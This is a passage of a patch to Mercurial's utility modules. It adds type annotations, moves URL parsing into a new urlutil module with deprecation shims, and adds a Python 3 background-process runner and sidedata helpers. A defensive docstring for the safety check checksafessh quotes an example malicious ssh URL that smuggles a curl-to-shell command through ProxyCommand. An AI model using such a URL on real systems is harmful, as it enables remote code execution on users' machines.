cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count] + return self.__class__(self) # pytype: disable=wrong-arg-count return self def copy(self): @@ -1285,11 +1296,13 @@ if pycompat.ispypy: # __setitem__() isn't called as of PyPy 5.8.0 - def update(self, src): + def update(self, src, **f): if isinstance(src, dict): src = pycompat.iteritems(src) for k, v in src: self[k] = v + for k in f: + self[k] = f[k] def insert(self, position, key, value): for (i, (k, v)) in enumerate(list(self.items())): @@ -1395,8 +1408,8 @@ __slots__ = ('next', 'prev', 'key', 'value', 'cost') def __init__(self): - self.next = None - self.prev = None + self.next = self + self.prev = self self.key = _notset self.value = None @@ -1435,9 +1448,7 @@ def __init__(self, max, maxcost=0): self._cache = {} - self._head = head = _lrucachenode() - head.prev = head - head.next = head + self._head = _lrucachenode() self._size = 1 self.capacity = max self.totalcost = 0 @@ -1542,6 +1553,7 @@ """ try: node = self._cache[k] + assert node is not None # help pytype return node.value except KeyError: if default is _notset: @@ -1599,6 +1611,9 @@ # Walk the linked list backwards starting at tail node until we hit # a non-empty node. n = self._head.prev + + assert n is not None # help pytype + while n.key is _notset: n = n.prev @@ -1833,6 +1848,7 @@ def pathto(root, n1, n2): + # type: (bytes, bytes, bytes) -> bytes """return the relative path from one place to another. root should use os.sep to separate directories n1 should use os.sep to separate directories @@ -2017,6 +2033,7 @@ def checkwinfilename(path): + # type: (bytes) -> Optional[bytes] r"""Check that the base-relative path is a valid filename on Windows. Returns None if the path is ok, or a UI string describing the problem. @@ -2111,6 +2128,7 @@ def readlock(pathname): + # type: (bytes) -> bytes try: return readlink(pathname) except OSError as why: @@ -2134,6 +2152,7 @@ def fscasesensitive(path): + # type: (bytes) -> bool """ Return true if the given path is on a case-sensitive filesystem @@ -2170,10 +2189,11 @@ def _checkre2(self): global _re2 global _re2_input + + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' try: # check if match works, see issue3964 - check_pattern = br'\[([^\[]+)\]' - check_input = b'[ui]' _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False @@ -2226,6 +2246,7 @@ def fspath(name, root): + # type: (bytes, bytes) -> bytes """Get name in the case stored in the filesystem The name should be relative to root, and be normcase-ed for efficiency. @@ -2270,6 +2291,7 @@ def checknlink(testfile): + # type: (bytes) -> bool '''check whether hardlink count reporting works properly''' # testfile may be open, so we need a separate file for checking to @@ -2303,8 +2325,9 @@ def endswithsep(path): + # type: (bytes) -> bool '''Check path ends with os.sep or os.altsep.''' - return ( + return bool( # help pytype path.endswith(pycompat.ossep) or pycompat.osaltsep and path.endswith(pycompat.osaltsep) @@ -2312,6 +2335,7 @@ def splitpath(path): + # type: (bytes) -> List[bytes] """Split path by os.sep. Note that this function does not use os.altsep because this is an alternative of simple "xxx.split(os.sep)". @@ -2540,6 +2564,7 @@ def unlinkpath(f, ignoremissing=False, rmdir=True): + # type: (bytes, bool, bool) -> None """unlink and remove the directory if it is empty""" if ignoremissing: tryunlink(f) @@ -2554,6 +2579,7 @@ def tryunlink(f): + # type: (bytes) -> None """Attempt to remove a file, ignoring ENOENT errors.""" try: unlink(f) @@ -2563,6 +2589,7 @@ def makedirs(name, mode=None, notindexed=False): + # type: (bytes, Optional[int], bool) -> None """recursive directory creation with parent mode inheritance Newly created directories are marked as "not to be indexed by @@ -2592,16 +2619,19 @@ def readfile(path): + # type: (bytes) -> bytes with open(path, b'rb') as fp: return fp.read() def writefile(path, text): + # type: (bytes, bytes) -> None with open(path, b'wb') as fp: fp.write(text) def appendfile(path, text): + # type: (bytes, bytes) -> None with open(path, b'ab') as fp: fp.write(text) @@ -2763,6 +2793,7 @@ def processlinerange(fromline, toline): + # type: (int, int) -> Tuple[int, int] """Check that linerange <fromline>:<toline> makes sense and return a 0-based range. @@ -2822,10 +2853,12 @@ def tolf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\n', s) def tocrlf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\r\n', s) @@ -2889,12 +2922,14 @@ def iterlines(iterator): + # type: (Iterator[bytes]) -> Iterator[bytes] for chunk in iterator: for line in chunk.splitlines(): yield line def expandpath(path): + # type: (bytes) -> bytes return os.path.expanduser(os.path.expandvars(path)) @@ -2924,396 +2959,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. - """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> - >>> url(b'ssh://[::1]:2200//home/joe/repo') - <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> - >>> url(b'file:///home/joe/repo') - <url scheme: 'file', path: '/home/joe/repo'> - >>> url(b'file:///c:/temp/foo/') - <url scheme: 'file', path: 'c:/temp/foo/'> - >>> url(b'bundle:foo') - <url scheme: 'bundle', path: 'foo'> - >>> url(b'bundle://../foo') - <url scheme: 'bundle', path: '../foo'> - >>> url(br'c:\foo\bar') - <url path: 'c:\\foo\\bar'> - >>> url(br'\\blah\blah\blah') - <url path: '\\\\blah\\blah\\blah'> - >>> url(br'\\blah\blah\blah#baz') - <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> - >>> url(br'file:///C:\users\me') - <url scheme: 'file', path: 'C:\\users\\me'> - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> - >>> url(b'ssh://joe@x/repo') - <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - <url scheme: 'http', host: 'host', path: 'a?b#c'> - - Empty path: - - >>> url(b'') - <url path: ''> - >>> url(b'#a') - <url path: '', fragment: 'a'> - >>> url(b'http://host/') - <url scheme: 'http', host: 'host', path: ''> - >>> url(b'http://host/#a') - <url scheme: 'http', host: 'host', path: '', fragment: 'a'> - - Only scheme: - - >>> url(b'http:') - <url scheme: 'http'> - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'<url %s>' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. - if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - return bool(url(path).scheme) - - -def hasdriveletter(path): - return path and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( @@ -3415,6 +3106,7 @@ def sizetoint(s): + # type: (bytes) -> int """Convert a space specifier to a byte count. >>> sizetoint(b'30') @@ -3640,6 +3332,7 @@ def _estimatememory(): + # type: () -> Optional[int] """Provide an estimate for the available system memory in Bytes. If no estimate can be provided on the platform, returns None. @@ -3647,7 +3340,12 @@ if pycompat.sysplatform.startswith(b'win'): # On Windows, use the GlobalMemoryStatusEx kernel function directly. from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG - from ctypes.wintypes import Structure, byref, sizeof, windll + from ctypes.wintypes import ( # pytype: disable=import-error + Structure, + byref, + sizeof, + windll, + ) class MEMORYSTATUSEX(Structure): _fields_ = [ diff --git a/mercurial/utils/compression.py b/mercurial/utils/compression.py --- a/mercurial/utils/compression.py +++ b/mercurial/utils/compression.py @@ -685,9 +685,11 @@ # while providing no worse compression. It strikes a good balance # between speed and compression. level = opts.get(b'level', 3) + # default to single-threaded compression + threads = opts.get(b'threads', 0) zstd = self._module - z = zstd.ZstdCompressor(level=level).compressobj() + z = zstd.ZstdCompressor(level=level, threads=threads).compressobj() for chunk in it: data = z.compress(chunk) if data: diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -18,6 +18,18 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + Dict, + Iterable, + Optional, + Tuple, + Union, + ) + + hgdate = Tuple[float, int] # (unixtime, offset) + # used by parsedate defaultdateformats = ( b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 @@ -62,13 +74,16 @@ def makedate(timestamp=None): + # type: (Optional[float]) -> hgdate """Return a unix timestamp (or the current time) as a (unixtime, offset) tuple based off the local timezone.""" if timestamp is None: timestamp = time.time() if timestamp < 0: hint = _(b"check your clock") - raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint) + raise error.InputError( + _(b"negative timestamp: %d") % timestamp, hint=hint + ) delta = datetime.datetime.utcfromtimestamp( timestamp ) - datetime.datetime.fromtimestamp(timestamp) @@ -77,6 +92,7 @@ def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'): + # type: (Optional[hgdate], bytes) -> bytes """represent a (unixtime, offset) tuple as a localized time. unixtime is seconds since the epoch, and offset is the time zone's number of seconds away from UTC. @@ -114,11 +130,13 @@ def shortdate(date=None): + # type: (Optional[hgdate]) -> bytes """turn (timestamp, tzoff) tuple into iso 8631 date.""" return datestr(date, format=b'%Y-%m-%d') def parsetimezone(s): + # type: (bytes) -> Tuple[Optional[int], bytes] """find a trailing timezone, if any, in string, and return a (offset, remainder) pair""" s = pycompat.bytestr(s) @@ -154,6 +172,7 @@ def strdate(string, format, defaults=None): + # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate """parse a localized time string and return a (unixtime, offset) tuple. if the string cannot be parsed, ValueError is raised.""" if defaults is None: @@ -196,6 +215,7 @@ def parsedate(date, formats=None, bias=None): + # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate """parse a localized date/time and return a (unixtime, offset) tuple. The date may be a "unixtime offset" string or in one of the specified @@ -221,8 +241,11 @@ bias = {} if not date: return 0, 0 - if isinstance(date, tuple) and len(date) == 2: - return date + if isinstance(date, tuple): + if len(date) == 2: + return date + else: + raise error.ProgrammingError(b"invalid date format") if not formats: formats = defaultdateformats date = date.strip() @@ -282,6 +305,7 @@ def matchdate(date): + # type: (bytes) -> Callable[[float], bool] """Return a function that matches a given date match specifier Formats include: @@ -311,10 +335,12 @@ """ def lower(date): + # type: (bytes) -> float d = {b'mb': b"1", b'd': b"1"} return parsedate(date, extendeddateformats, d)[0] def upper(date): + # type: (bytes) -> float d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"} for days in (b"31", b"30", b"29"): try: @@ -328,24 +354,26 @@ date = date.strip() if not date: - raise error.Abort(_(b"dates cannot consist entirely of whitespace")) + raise error.InputError( + _(b"dates cannot consist entirely of whitespace") + ) elif date[0:1] == b"<": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '<DATE'")) + raise error.InputError(_(b"invalid day spec, use '<DATE'")) when = upper(date[1:]) return lambda x: x <= when elif date[0:1] == b">": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '>DATE'")) + raise error.InputError(_(b"invalid day spec, use '>DATE'")) when = lower(date[1:]) return lambda x: x >= when elif date[0:1] == b"-": try: days = int(date[1:]) except ValueError: - raise error.Abort(_(b"invalid day spec: %s") % date[1:]) + raise error.InputError(_(b"invalid day spec: %s") % date[1:]) if days < 0: - raise error.Abort( + raise error.InputError( _(b"%s must be nonnegative (see 'hg help dates')") % date[1:] ) when = makedate()[0] - days * 3600 * 24 diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -1,7 +1,7 @@ # procutil.py - utility for managing processes and executable environment # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -701,7 +701,88 @@ else: - def runbgcommand( + def runbgcommandpy3( + cmd, + env, + shell=False, + stdout=None, + stderr=None, + ensurestart=True, + record_wait=None, + stdin_bytes=None, + ): + """Spawn a command without waiting for it to finish. + + + When `record_wait` is not None, the spawned process will not be fully + detached and the `record_wait` argument will be called with a the + `Subprocess.wait` function for the spawned process. This is mostly + useful for developers that need to make sure the spawned process + finished before a certain point. (eg: writing test)""" + if pycompat.isdarwin: + # avoid crash in CoreFoundation in case another thread + # calls gui() while we're calling fork(). + gui() + + if shell: + script = cmd + else: + if isinstance(cmd, bytes): + cmd = [cmd] + script = b' '.join(shellquote(x) for x in cmd) + if record_wait is None: + # double-fork to completely detach from the parent process + script = b'( %s ) &' % script + start_new_session = True + else: + start_new_session = False + ensurestart = True + + try: + if stdin_bytes is None: + stdin = subprocess.DEVNULL + else: + stdin = pycompat.unnamedtempfile() + stdin.write(stdin_bytes) + stdin.flush() + stdin.seek(0) + if stdout is None: + stdout = subprocess.DEVNULL + if stderr is None: + stderr = subprocess.DEVNULL + + p = subprocess.Popen( + script, + shell=True, + env=env, + close_fds=True, + stdin=stdin, + stdout=stdout, + stderr=stderr, + start_new_session=start_new_session, + ) + except Exception: + if record_wait is not None: + record_wait(255) + raise + finally: + if stdin_bytes is not None: + stdin.close() + if not ensurestart: + # Even though we're not waiting on the child process, + # we still must call waitpid() on it at some point so + # it's not a zombie/defunct. This is especially relevant for + # chg since the parent process won't die anytime soon. + # We use a thread to make the overhead tiny. + t = threading.Thread(target=lambda: p.wait) + t.daemon = True + t.start() + else: + returncode = p.wait + if record_wait is not None: + record_wait(returncode) + + def runbgcommandpy2( cmd, env, shell=False, @@ -811,3 +892,14 @@ stdin.close() if record_wait is None: os._exit(returncode) + + if pycompat.ispy3: + # This branch is more robust, because it avoids running python + # code (hence gc finalizers, like sshpeer.__del__, which + # blocks). But we can't easily do the equivalent in py2, + # because of the lack of start_new_session=True flag. Given + # that the py2 branch should die soon, the short-lived + # duplication seems acceptable. + runbgcommand = runbgcommandpy3 + else: + runbgcommand = runbgcommandpy2 diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -1,7 +1,7 @@ # resourceutil.py - utility for looking up resources # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -23,6 +23,7 @@ pycompat, ) from ..interfaces import repository +from ..revlogutils import sidedata as sidedatamod from ..utils import hashutil _nullhash = hashutil.sha1(nullid) @@ -294,6 +295,7 @@ deltamode=repository.CG_DELTAMODE_STD, revisiondata=False, assumehaveparentrevisions=False, + sidedata_helpers=None, ): """Generic implementation of ifiledata.emitrevisions(). @@ -356,6 +358,21 @@ ``nodesorder`` ``revisiondata`` ``assumehaveparentrevisions`` + ``sidedata_helpers`` (optional) + If not None, means that sidedata should be included. + A dictionary of revlog type to tuples of `(repo, computers, removers)`: + * `repo` is used as an argument for computers + * `computers` is a list of `(category, (keys, computer)` that + compute the missing sidedata categories that were asked: + * `category` is the sidedata category + * `keys` are the sidedata keys to be affected + * `computer` is the function `(repo, store, rev, sidedata)` that + returns a new sidedata dict. + * `removers` will remove the keys corresponding to the categories + that are present, but not needed. + If both `computers` and `removers` are empty, sidedata are simply not + transformed. + Revlog types are `changelog`, `manifest` or `filelog`. """ fnode = store.node @@ -469,6 +486,17 @@ available.add(rev) + sidedata = None + if sidedata_helpers: + sidedata = store.sidedata(rev) + sidedata = run_sidedata_helpers( + store=store, + sidedata_helpers=sidedata_helpers, + sidedata=sidedata, + rev=rev, + ) + sidedata = sidedatamod.serialize_sidedata(sidedata) + yield resultcls( node=node, p1node=fnode(p1rev), @@ -478,11 +506,31 @@ baserevisionsize=baserevisionsize, revision=revision, delta=delta, + sidedata=sidedata, ) prevrev = rev +def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev): + """Returns the sidedata for the given revision after running through + the given helpers. + - `store`: the revlog this applies to (changelog, manifest, or filelog + instance) + - `sidedata_helpers`: see `storageutil.emitrevisions` + - `sidedata`: previous sidedata at the given rev, if any + - `rev`: affected rev of `store` + """ + repo, sd_computers, sd_removers = sidedata_helpers + kind = store.revlog_kind + for _keys, sd_computer in sd_computers.get(kind, []): + sidedata = sd_computer(repo, store, rev, sidedata) + for keys, _computer in sd_removers.get(kind, []): + for key in keys: + sidedata.pop(key, None) + return sidedata + + def deltaiscensored(delta, baserev, baselenfn): """Determine if a delta represents censored revision data. diff --git a/mercurial/utils/stringutil.py b/mercurial/utils/stringutil.py --- a/mercurial/utils/stringutil.py +++ b/mercurial/utils/stringutil.py @@ -1,7 +1,7 @@ # stringutil.py - utility for generic string formatting, parsing, etc. # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py new file mode 100644 --- /dev/null +++ b/mercurial/utils/urlutil.py @@ -0,0 +1,792 @@ +# utils.urlutil - code related to [paths] management +# +# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. +import os +import re as remod +import socket + +from ..i18n import _ +from ..pycompat import ( + getattr, + setattr, +) +from .. import ( + encoding, + error, + pycompat, + urllibcompat, +) + + +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. + + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. + + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> + >>> url(b'ssh://[::1]:2200//home/joe/repo') + <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> + >>> url(b'file:///home/joe/repo') + <url scheme: 'file', path: '/home/joe/repo'> + >>> url(b'file:///c:/temp/foo/') + <url scheme: 'file', path: 'c:/temp/foo/'> + >>> url(b'bundle:foo') + <url scheme: 'bundle', path: 'foo'> + >>> url(b'bundle://../foo') + <url scheme: 'bundle', path: '../foo'> + >>> url(br'c:\foo\bar') + <url path: 'c:\\foo\\bar'> + >>> url(br'\\blah\blah\blah') + <url path: '\\\\blah\\blah\\blah'> + >>> url(br'\\blah\blah\blah#baz') + <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> + >>> url(br'file:///C:\users\me') + <url scheme: 'file', path: 'C:\\users\\me'> + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> + >>> url(b'ssh://joe@x/repo') + <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + <url scheme: 'http', host: 'host', path: 'a?b#c'> + + Empty path: + + >>> url(b'') + <url path: ''> + >>> url(b'#a') + <url path: '', fragment: 'a'> + >>> url(b'http://host/') + <url scheme: 'http', host: 'host', path: ''> + >>> url(b'http://host/#a') + <url scheme: 'http', host: 'host', path: '', fragment: 'a'> + + Only scheme: + + >>> url(b'http:') + <url scheme: 'http'> + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility 